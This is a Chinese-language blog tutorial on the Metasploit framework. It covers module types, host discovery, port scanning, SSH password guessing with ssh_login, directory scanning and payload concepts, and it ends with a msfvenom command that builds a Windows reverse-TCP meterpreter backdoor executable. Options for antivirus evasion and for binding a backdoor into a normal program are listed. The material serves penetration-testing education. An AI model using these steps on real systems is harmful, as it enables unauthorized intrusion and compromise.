<!DOCTYPE html>
<html lang="zh-Hans">
<head>

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no" />
<meta name="author" content="krismile" />



<meta name="description" content="渗透工具—MSF的使用简介Metasploit是一款开源安全漏洞检测工具，附带数百个已知的软件漏洞，并保持频繁更新，是强大的渗透测试框架。msf使用的是postgresql数据库。">
<meta property="og:type" content="article">
<meta property="og:title" content="KrismileBlog">
<meta property="og:url" content="https://krismile-ni.github.com/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/index.html">
<meta property="og:site_name" content="KrismileBlog">
<meta property="og:description" content="渗透工具—MSF的使用简介Metasploit是一款开源安全漏洞检测工具，附带数百个已知的软件漏洞，并保持频繁更新，是强大的渗透测试框架。msf使用的是postgresql数据库。">
<meta property="og:locale">
<meta property="og:image" content="https://krismile-ni.github.com/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/1.png">
<meta property="og:image" content="https://krismile-ni.github.com/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/2.png">
<meta property="og:image" content="https://krismile-ni.github.com/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/3.png">
<meta property="og:image" content="https://krismile-ni.github.com/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/4.png">
<meta property="og:image" content="https://krismile-ni.github.com/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/5.png">
<meta property="og:image" content="https://krismile-ni.github.com/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/6.png">
<meta property="og:image" content="https://krismile-ni.github.com/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/7.png">
<meta property="og:image" content="https://krismile-ni.github.com/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/8.png">
<meta property="og:image" content="https://krismile-ni.github.com/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/9.png">
<meta property="og:image" content="https://krismile-ni.github.com/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/10.png">
<meta property="og:image" content="https://krismile-ni.github.com/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/11.png">
<meta property="og:image" content="https://krismile-ni.github.com/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/12.png">
<meta property="article:published_time" content="2022-08-22T09:12:46.290Z">
<meta property="article:modified_time" content="2023-05-14T14:58:43.030Z">
<meta property="article:author" content="krismile">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://krismile-ni.github.com/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/1.png">

<link rel="apple-touch-icon" href= "/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="KrismileBlog" type="application/atom+xml">



    <link rel="shortcut icon" href="/img/head.png">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">



<link rel="stylesheet" href="/css/style.css">




<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>KrismileBlog</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: true
    }
</script>


    <script>
        yiliaConfig.jquery_ui = [true, "//cdn.bootcss.com/jqueryui/1.10.4/jquery-ui.min.js", "//cdn.bootcss.com/jqueryui/1.10.4/css/jquery-ui.min.css"];
    </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






<meta name="generator" content="Hexo 6.1.0"></head>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/head.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/"></a></h1>
        </hgroup>

        

        
            <form id="search-form">
            <input type="text" id="local-search-input" name="q" placeholder="search..." class="search form-control" autocomplete="off" autocorrect="off" searchonload="" />
            <i class="fa fa-times" onclick="resetSearch()"></i>
            </form>
            <div id="local-search-result"></div>
            <p class='no-result'>No results found <i class='fa fa-spinner fa-pulse'></i></p>
        


        
            <div id="switch-btn" class="switch-btn">
                <div class="icon">
                    <div class="icon-ctn">
                        <div class="icon-wrap icon-house" data-idx="0">
                            <div class="birdhouse"></div>
                            <div class="birdhouse_holes"></div>
                        </div>
                        <div class="icon-wrap icon-ribbon hide" data-idx="1">
                            <div class="ribbon"></div>
                        </div>
                        
                        <div class="icon-wrap icon-link hide" data-idx="2">
                            <div class="loopback_l"></div>
                            <div class="loopback_r"></div>
                        </div>
                        
                        
                        <div class="icon-wrap icon-me hide" data-idx="3">
                            <div class="user"></div>
                            <div class="shoulder"></div>
                        </div>
                        
                    </div>
                    
                </div>
                <div class="tips-box hide">
                    <div class="tips-arrow"></div>
                    <ul class="tips-inner">
                        <li>菜单</li>
                        <li>标签</li>
                        
                        <li>友情链接</li>
                        
                        
                        <li>关于我</li>
                        
                    </ul>
                </div>
            </div>
        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/archives/">首页</a></li>
                        
                            <li><a href="/tags/">标签</a></li>
                        
                            <li><a href="/about/">关于我</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="/nichengxin1234@163.com" title="Email"></a>
                            
                                <a class="fa GitHub" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                <section class="switch-part switch-part2">
                    <div class="widget tagcloud" id="js-tagcloud">
                        <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/ICS/" rel="tag">ICS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/Phar%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">Phar反序列化</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/RCE/" rel="tag">RCE</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/SQL%E6%B3%A8%E5%85%A5/" rel="tag">SQL注入</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/" rel="tag">XSS</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/ctf%E6%AF%94%E8%B5%9B/" rel="tag">ctf比赛</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/md5/" rel="tag">md5</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="tag">php反序列化</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web%E5%9F%BA%E7%A1%80/" rel="tag">web基础</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web%E5%9F%BA%E7%A1%80%EF%BC%8CJWT/" rel="tag">web基础，JWT</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/web%E6%B8%97%E9%80%8F/" rel="tag">web渗透</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/" rel="tag">信息收集</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" rel="tag">渗透测试</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95%E3%80%81SQL%E6%B3%A8%E5%85%A5%E3%80%81%E5%8F%8D%E5%BC%B9shell/" rel="tag">渗透测试、SQL注入、反弹shell</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E9%9D%B6%E6%9C%BA/" rel="tag">靶机</a></li></ul>
                    </div>
                </section>
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://www.cnblogs.com/willing-sir/">willing-sir</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_52125240?type=blog">Jokermans</a>
                    
                      <a class="main-nav-link switch-friends-link" target="_blank" rel="noopener" href="https://www.bietiaop.com/">bietiaop</a>
                    
                    </div>
                </section>
                

                
                
                <section class="switch-part switch-part4">
                
                    <div id="js-aboutme">哈哈哈</div>
                </section>
                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页"></a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/head.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页"></a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/archives/">首页</a></li>
                
                    <li><a href="/tags/">标签</a></li>
                
                    <li><a href="/about/">关于我</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="/nichengxin1234@163.com" title="Email"></a>
                            
                                <a class="fa GitHub" target="_blank" href="#" title="GitHub"></a>
                            
                                <a class="fa RSS" target="_blank" href="/atom.xml" title="RSS"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我"/>
</nav>
      <div class="body-wrap"><article id="post-渗透工具---MSF的使用" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/" class="article-date">
      <time datetime="2022-08-22T09:12:46.290Z" itemprop="datePublished">2022-08-22</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <h2 id="渗透工具—MSF的使用"><a href="#渗透工具—MSF的使用" class="headerlink" title="渗透工具—MSF的使用"></a>渗透工具—MSF的使用</h2><h3 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h3><p>Metasploit是一款开源安全漏洞检测工具，附带数百个已知的软件漏洞，并保持频繁更新，是强大的渗透测试框架。msf使用的是postgresql数据库。</p>
<span id="more"></span>

<h4 id="MSF模块"><a href="#MSF模块" class="headerlink" title="MSF模块"></a>MSF模块</h4><p>1、辅助模块auxiliary</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">负责执行信息收集、扫描、嗅探、指纹识别、口令猜测和Dos攻击等</span><br></pre></td></tr></table></figure>

<p>2、攻击模块exploits</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">利用发现的安全漏洞或配置弱点对远程目标系统进行攻击，从而获得对远程目标系统访问权的代码组件。此模块对应的每一个具体漏洞的攻击方法（主动、被动）</span><br><span class="line">主动渗透攻击：发送网络数据，触发安全漏洞</span><br><span class="line">被动渗透攻击：浏览器软件漏洞攻击和文件格式漏洞攻击，引诱目标用户打开触发</span><br></pre></td></tr></table></figure>

<p>3、攻击载荷模块payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">攻击成功后促使靶机运行的一段植入代码，比如反弹shell、bind shell等</span><br></pre></td></tr></table></figure>

<p>4、后渗透攻击模块post</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">在受控系统中进行各种各样的后渗透攻击动作，比如获取敏感信息、进一步拓展、实施跳板攻击等</span><br></pre></td></tr></table></figure>

<p>5、编码模块Encoders</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">将攻击载荷进行编码，来绕过防护软件拦截</span><br></pre></td></tr></table></figure>

<p>6、免杀模块evasion</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">可以创建反杀毒软件的木马</span><br></pre></td></tr></table></figure>

<h4 id="常见命令"><a href="#常见命令" class="headerlink" title="常见命令"></a>常见命令</h4><table>
<thead>
<tr>
<th>命令</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>use</td>
<td>使用某个模块</td>
</tr>
<tr>
<td>info</td>
<td>查看模块的详细信息</td>
</tr>
<tr>
<td>set</td>
<td>模块选型设置</td>
</tr>
<tr>
<td>exploit&#x2F;run</td>
<td>启动脚本</td>
</tr>
<tr>
<td>search</td>
<td>搜索关键字</td>
</tr>
<tr>
<td>show options</td>
<td>查看脚本配置选项</td>
</tr>
<tr>
<td>show targets</td>
<td>显示适用的主机类型</td>
</tr>
<tr>
<td>show payloads</td>
<td>显示适用的payload类型</td>
</tr>
</tbody></table>
<h4 id="使用方法"><a href="#使用方法" class="headerlink" title="使用方法"></a>使用方法</h4><p>（1）进入框架：<code>msfconsole</code></p>
<p>（2）使用search命令查找相关漏洞：<code>search xxx</code></p>
<p>（3）使用use进入模块：<code>use xxx</code></p>
<p>（4）使用info查看模块信息：<code>info</code></p>
<p>（5）设置攻击载荷：<code>set payload xxx</code></p>
<p>（6）查看模块需要配置的参数：<code>show options</code></p>
<p>（7）设置参数：<code>set RHOST ip</code></p>
<p>（8）攻击：<code>exploit/run</code></p>
<p>（9）后渗透阶段</p>
<p><strong>不同的攻击用到的步骤也不一样，这是一成不变的，需要灵活使用。也可以将攻击代码写入configure.rc配置文件中，然后使用命令<code>msfconsole -r configure.rc</code>进行自动攻击</strong></p>
<h3 id="MSF信息收集"><a href="#MSF信息收集" class="headerlink" title="MSF信息收集"></a>MSF信息收集</h3><h4 id="主机发现"><a href="#主机发现" class="headerlink" title="主机发现"></a>主机发现</h4><p>目录<code>auxiliary/scanner/discovery/</code>下有7个脚本用来信息收集</p>
<p><img src="/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/1.png" alt="image-20220822174528065"></p>
<p>（1）arp-sweep：arp扫描本地网络发现</p>
<p>（2）empty_udp：UDP空探测器</p>
<p>（3）ipv6_multicast_ping：IPv6链路本地&#x2F;节点本地Ping发现</p>
<p>（4）ipv6_neighbor：IPv6本地邻居发现</p>
<p>（5）ipv6_neighbor_router_advertisement：使用路由器通告的IPv6本地邻居发现</p>
<p>（6）udp_probe：UDP服务探测器</p>
<p>（7）udp_sweep：UDP服务清理程序</p>
<p>例如：arp_sweep</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/discovery/arp_sweep</span><br><span class="line">show options</span><br><span class="line">set RHOSTS ip</span><br><span class="line">set threads xx</span><br><span class="line">run/exploit</span><br></pre></td></tr></table></figure>

<p>show options：</p>
<p><img src="/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/2.png" alt="image-20220822181714767"></p>
<p>RHOSTS、THREADS和TIMEOUT在设置时是必要的，但后两个有初始的设置</p>
<p><img src="/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/3.png" alt="image-20220822232122499"></p>
<p>发现192.168.19.132&#x2F;24网段有4个主机</p>
<h4 id="端口扫描"><a href="#端口扫描" class="headerlink" title="端口扫描"></a>端口扫描</h4><p>使用<code>auxiliary/scanner/portscan/*</code>模块，一般情况下推荐使用syn端口扫描器，扫描速度快且不容易被发现</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/portscan/syn</span><br><span class="line">show options</span><br><span class="line">set RHOSTS ip</span><br><span class="line">set POSTS 1-65535</span><br><span class="line">set threads 50000</span><br><span class="line">run/exploit</span><br></pre></td></tr></table></figure>

<p><img src="/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/4.png" alt="image-20220823001736927"></p>
<p>发现有三个端口开放</p>
<h4 id="探测服务详细信息"><a href="#探测服务详细信息" class="headerlink" title="探测服务详细信息"></a>探测服务详细信息</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sudo nmap A -p- -sS sC -T4 -Pn 192.168.19.132</span><br></pre></td></tr></table></figure>

<h4 id="服务查点"><a href="#服务查点" class="headerlink" title="服务查点"></a>服务查点</h4><p>msf中scanner辅助模块中，很多用于服务扫描和查点的工具，常以<code>[service_name]_version</code>和<code>[service_name]_login</code>命名</p>
<p><code>[service_name]_version</code>可以用于遍历网络中包含了某种服务的主机，并进一步确定服务的版本</p>
<p><code>[service_name]_login</code>可以对某种服务进行口令探测攻击</p>
<p>例如：SSH服务扫描</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">search ssh_version</span><br><span class="line">use 3</span><br><span class="line">show options</span><br><span class="line">set RHOSTS ip</span><br><span class="line">set threads xx</span><br><span class="line">run/exploit</span><br></pre></td></tr></table></figure>

<p><img src="/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/5.png" alt="image-20220823002549607"></p>
<p>发现192.168.19.134的22端口ssh服务开启了</p>
<p><strong>其他服务查点：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/telnet/telnet_version      #telnet服务扫描</span><br><span class="line">use auxiliary/scanner/oracle/tnslsnr_version     #oracle服务扫描</span><br><span class="line">use auxiliary/scanner/mssql/mssql_ping			 #mssql扫描</span><br><span class="line">use auxiliary/scanner/mysql/mysql_version		  #mysql扫描</span><br><span class="line">use auxiliary/scanner/ftp/ftp_version			 #ftp扫描</span><br><span class="line">use auxiliary/scanner/http/http_version			 #http扫描</span><br></pre></td></tr></table></figure>

<h4 id="口令猜测"><a href="#口令猜测" class="headerlink" title="口令猜测"></a>口令猜测</h4><p>kali中字典位置：<code>/usr/share/wordlists</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">search ssh_login</span><br><span class="line">use auxiliary/scanner/ssh/ssh_login</span><br><span class="line">set RHOST 192.168.19.134</span><br><span class="line">set USERname kail</span><br><span class="line">set PASS_FILE /xxxx/xxxx #路径为字典位置</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<h4 id="网站敏感目录扫描"><a href="#网站敏感目录扫描" class="headerlink" title="网站敏感目录扫描"></a>网站敏感目录扫描</h4><p>可以自行添加字典</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">use auxiliary/scanner/http/dir_scanner</span><br><span class="line">set RHOST 192.168.19.134</span><br><span class="line">run</span><br></pre></td></tr></table></figure>

<p><img src="/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/6.png" alt="image-20220823004406624"></p>
<h3 id="漏洞利用（exploit）"><a href="#漏洞利用（exploit）" class="headerlink" title="漏洞利用（exploit）"></a>漏洞利用（exploit）</h3><p>漏洞利用exploit（exp），即对漏洞进行攻击的代码</p>
<p>MSF中漏洞利用模块路径：<code>/usr/share/metasploit-framework/modules/exploits</code>，有针对不同平台的exploit。</p>
<p><img src="/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/7.png" alt="image-20220824183642528"></p>
<p><strong>windows:</strong></p>
<p>针对不同服务的漏洞利用（攻击代码）：</p>
<p><img src="/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/8.png" alt="image-20220824183857192"></p>
<p>例如：smb服务（用于web连接和客户端与服务器之间的信息沟通，该服务经常爆出漏洞，永恒之蓝漏洞（ms17_010）就基于这个服务</p>
<p><img src="/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/9.png" alt="image-20220824184606595"></p>
<h3 id="攻击载荷（payload）"><a href="#攻击载荷（payload）" class="headerlink" title="攻击载荷（payload）"></a>攻击载荷（payload）</h3><p>攻击载荷payload模块路径：<code>/usr/share/metasploit-framework/modules/payloads</code></p>
<p><img src="/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/10.png" alt="image-20220824195759239"></p>
<p>Payload中包含攻击进入目标主机后需要在远程系统中运行的恶意代码。在MSF中Payload是一种特殊模块，它们能够以漏洞利用模块运行，并能够利用目标系统中的安全漏洞实施攻击。</p>
<p><strong>Shellcode：</strong>在渗透攻击时作为攻击载荷运行的一组机器指令（汇编语言）。在大多数情况下，目标系统执行了shellcode这一组指令后，才会提供一个命令行shell。</p>
<p>payload模块有三种类型：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">-Single（独立载荷）</span><br><span class="line">可直接植入目标系统并执行相应的程序（payload:shell_bind_tcp)</span><br><span class="line"></span><br><span class="line">-Stager（传输器载荷）</span><br><span class="line">用于目标机与攻击机之间建立稳定的网络连接，与传输载荷配合攻击。</span><br><span class="line">分类：bind型 需要攻击机主动连接目标端口</span><br><span class="line">    reverse型 目标机会反连接攻击机，提前设定号连接攻击机的IP地址和端口</span><br><span class="line"></span><br><span class="line">-Stage（传输体载荷）</span><br><span class="line">stager建立连接后，攻击机将stage传输给目标机，有stager进行相应处理，将控制权转交给stage</span><br><span class="line">例：</span><br><span class="line">得到目标机的shell或meterpreter控制程序运行，攻击机可以在本段输入相应命令控制目标机</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h3 id="使用方式"><a href="#使用方式" class="headerlink" title="使用方式"></a>使用方式</h3><h4 id="方法一"><a href="#方法一" class="headerlink" title="方法一"></a>方法一</h4><p><code>exploit+payload</code>，exploit是指利用漏洞的一个过程和方法，最终的目的是为了执行payload，payload是真正实现攻击的代码。在使用exploit时，使用use来调用模块，用set调用各种payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use payload/windows/shell_bind_tcp</span><br></pre></td></tr></table></figure>

<p><img src="/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/11.png" alt="image-20220824235255291"></p>
<h4 id="方法二"><a href="#方法二" class="headerlink" title="方法二"></a>方法二</h4><p>直接使用payload，但第一步同方法一，接着可以使用generate命令来生成payload</p>
<p><img src="/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/12.png" alt="image-20220824235706500"></p>
<p>获得payload的一些基本信息和设置的参数，buf时payload的16进制表示方式。</p>
<p><strong>但是</strong>，payload中可能存在所谓的“坏字符”，它们在执行过程中会被过滤掉或以其他语义的方式被执行，导致payload在目标系统上执行和预期结果不一致。</p>
<p>例：缓冲区溢出中，会把“\x00”当作一个“坏字符”，导致shellcode无法执行</p>
<h3 id="MSF后门生成"><a href="#MSF后门生成" class="headerlink" title="MSF后门生成"></a>MSF后门生成</h3><p>msfvenom常用命令参数</p>
<table>
<thead>
<tr>
<th>命令</th>
<th>描述</th>
</tr>
</thead>
<tbody><tr>
<td>-l</td>
<td>列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops,…all</td>
</tr>
<tr>
<td>-p</td>
<td>指定需要使用的payload(攻击荷载)。也可以使用自定义payload,几乎是支持全平台的</td>
</tr>
<tr>
<td>-f</td>
<td>指定输出格式</td>
</tr>
<tr>
<td>-e</td>
<td>指定需要使用的encoder（编码器）编码免杀</td>
</tr>
<tr>
<td>-a</td>
<td>指定payload的目标架构，例如x86 还是 x64 还是 x86_64</td>
</tr>
<tr>
<td>-o</td>
<td>指定创建好的payload的存放位置</td>
</tr>
<tr>
<td>-b</td>
<td>设定规避字符集，指定需要过滤的坏字符。例如：不使用 ‘\x0f’、’\x00’</td>
</tr>
<tr>
<td>-n</td>
<td>为payload预先指定一个NOP滑动长度</td>
</tr>
<tr>
<td>-s</td>
<td>设定有效攻击荷载的最大长度生成payload的最大长度，就是文件大小</td>
</tr>
<tr>
<td>-i</td>
<td>指定payload的编码次数</td>
</tr>
<tr>
<td>-c</td>
<td>指定一个附加的win32 shellcode文件</td>
</tr>
<tr>
<td>-x</td>
<td>指定一个自定义的可执行文件作为模板。例如：原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面</td>
</tr>
<tr>
<td>-k</td>
<td>保护模板程序的动作，注入的payload作为一个新的进程运行。例如：原先有个正常文件normal.exe 可以通过这个选项把后门捆绑到这个程序上面</td>
</tr>
<tr>
<td>-v</td>
<td>指定一个自定义的变量，以确定输出格式</td>
</tr>
<tr>
<td>-t</td>
<td>从stdin读取有效负载时等待的秒数（默认为30，0表示禁用)</td>
</tr>
<tr>
<td>-h</td>
<td>查看帮助选项</td>
</tr>
<tr>
<td>-platform</td>
<td>指定payload的目标平台</td>
</tr>
</tbody></table>
<h4 id="普通生成"><a href="#普通生成" class="headerlink" title="普通生成"></a>普通生成</h4><p>生成命令：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">msfvenom -p 有效载荷 -f 输出格式 -o 输出文件</span><br><span class="line">例：msfvenom -p windows/meterpreter/reverse_tcp -f exe -o payload.exe</span><br></pre></td></tr></table></figure>






      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2022/08/22/%E6%B8%97%E9%80%8F%E5%B7%A5%E5%85%B7---MSF%E7%9A%84%E4%BD%BF%E7%94%A8/"></a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页"></a></p>
        <p><span>发布时间:</span>2022-08-22, 17:12:46</p>
        <p><span>最后更新:</span>2023-05-14, 22:58:43</p>
        <p>
